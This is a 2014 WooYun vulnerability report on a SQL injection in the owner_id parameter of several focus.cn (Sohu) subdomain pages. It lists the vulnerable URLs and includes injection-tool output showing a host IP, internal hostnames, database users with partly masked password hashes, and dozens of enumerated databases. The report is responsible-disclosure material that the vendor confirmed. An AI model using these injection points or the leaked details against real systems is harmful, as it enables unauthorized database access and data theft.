漏洞概要 关注数(24) 关注此漏洞
缺陷编号:wooyun-2014-059484
漏洞标题:搜狐(第二季)旗下某站通用型sql注入第三集(涉及数据库个数已经数不过来了)
相关厂商:搜狐
漏洞作者: 浩天
提交时间:2014-05-05 10:54
修复时间:2014-06-19 10:55
公开时间:2014-06-19 10:55
漏洞类型:SQL注射漏洞
危害等级:高
自评Rank:20
漏洞状态:厂商已经确认
漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]
Tags标签: 无
漏洞详情
披露状态:
2014-05-05: 细节已通知厂商并且等待厂商处理中
2014-05-05: 厂商已经确认,细节仅向厂商公开
2014-05-15: 细节向核心白帽子及相关领域专家公开
2014-05-25: 细节向普通白帽子公开
2014-06-04: 细节向实习白帽子公开
2014-06-19: 细节向公众公开
简要描述:
子站通用注入,不同域名链接的数据库服务器不一样,搜狐真是财大气粗,每个域名读库,发现都是不同的,从几十到上百的都有,影响的数据库个数多的数不过来,我也不一一尝试了
求个搜狐的礼物,可以有么,同志们你们说,应不应该
详细说明:
home、house域名有并发限制,请求大了就自动限制访问了,偏南方的域名没有限制
http://home.focus.cn/materials/owner_info.php?owner_id=5
这个涉及12个核心库,建议用下面的子域名尝试验证注入,home读的慢,得放胡萝卜里,sqlmap二了
http://sz.focus.cn/materials/owner_info.php?owner_id=46
http://cd.focus.cn/materials/owner_info.php?owner_id=9
http://wh.focus.cn/materials/owner_info.php?owner_id=14 我用的这个
http://cq.focus.cn/materials/owner_info.php?owner_id=6 还有这个
......
这个太多了,来张图吧,之前发的注入,也都是这种通用的情况
漏洞证明:
下面应该是87个库,其实还有很多,太多就不读了
Target: http://cq.focus.cn/materials/owner_info.php?owner_id=6
Host IP: 123.125.92.26
Web Server: Apache
DB Server: MySQL Blind
Resp. Time(avg): 47 ms
Current User: fdbuser@10.10.90.21
Sql Version: 5.1.55-log
Current DB: cqhouse
System User: fdbuser@10.10.90.21
Host Name: focus-gvm-10-10-90-187.no.sohu.com
Installation dir: /usr/local/mysql-5.1.55-linux-x86_64-glibc23/
DB User & Pass: root::localhost
root::127.0.0.1
readonly:5dd*********19d:%
mysqlmon:*565E94D*********8B6C0A37F:10.10.90.187
pingmysql:*565E94D80*********B6C0A37F:10.11.36.20
Data Bases: information_schema
ahsuzhouhouse
ahsuzhouhouse_forum
ahsuzhouhouse_sort
cdhouse
cdhouse_forum
cdhouse_sort
chenzhouhouse
chenzhouhouse_forum
chenzhouhouse_sort
cqhouse
cqhouse_forum
cqhouse_sort
deyanghouse
deyanghouse_forum
deyanghouse_sort
fshouse
fshouse_forum
fshouse_sort
ganzhouhouse
ganzhouiouse_forum
ganzhouhouse_sort
heyuanhouse
heyuanhouse_forum
heyuanhouse_sort
huangshihouse
huangshihouse_forum
huangshihouse_sort
jiangmenhouse
jiangmenhouse_forum
jiangmenhouse_sort
luanhouse
luanhouse_forum
luanhouse_sort
luzhouhouse
luzhouhouse_forum
luzhouhouse_sort
meishanhouse
meishanhouse_forum
meishanhouse_sort
mianyanghouse
mianyanghouse_forum
mianyanghouse_sort
mysql
mysql_identity
nanchonghouse
nanchonghouse_forum
nanchonghouse_sort
njhouse
njhouse_forum
njhouse_sort
nnhouse
nnhouse_forum
nnhouse_sort
qyhouse
qyhouse_forum
qyhouse_sort
shaoguanhouse
shaoguanhouse_forum
shaoguanhouse_sort
shundehouse
shundehouse_forum
shundehouse_sort
tonglinghouse
tonglinghouse_forum
tonglinghouse_sort
weinanhouse
weinanhouse_forum
weinanhouse_sort
wlmqhouse
wlmqhouse_forum
wlmqhouse_sort
wzhouse
wzhoute_forum
wzhquse_sort
xiaoganhouse
xiaoganhouse_forum
xiaoganhouse_sort
zhangzhouhouse
zhangzhouhouse_forum
zhangzhouhouue_sort
zhaoqingrouse
zhaoqinghouse_forur
zhaoqinghouse_sort
zjhouse
zjhouse_forum
zjhouse_sort
这个就读了几个,证明一下得了
Target: http://wh.focus.cn/materials/owner_info.php?owner_id=14
Host IP: 123.125.92.26
Web Server: Apache
DB Server: MySQL Blind
Resp. Time(avg): 43 ms
Current User: fdbuser@10.10.90.133
Sql Version: 5.1.55-log
Current DB: whhouse
System User: fdbuser@10.10.90.133
Host Name: vm-10-10-90-199-sas.cp.no.sohu.com
Installation dir: /usr/local/mysql5.1.55/
DB User & Pass: root::localhost
pingmysql:*565E9*********6C0A37F:10.11.36.20
root::127.0.0.1
Data Bases: information_schema
dongguanhouse
dongguanhouse_forum
dongguanhouse_sort
gzhouse
gzhouse_forum
gzhouse_sort
mysql
mysql_identity
test
whhouse
whhouse_forum
whhouse_sort
不继续了
修复方案:
求个搜狐的礼物,可以有么,我感觉我挺不容易的,你们也不容
版权声明:转载请注明来源 浩天@乌云
漏洞回应
厂商回应:
危害等级:高
漏洞Rank:20
确认时间:2014-05-05 11:27
厂商回复:
感谢对搜狐安全关注
最新状态:
暂无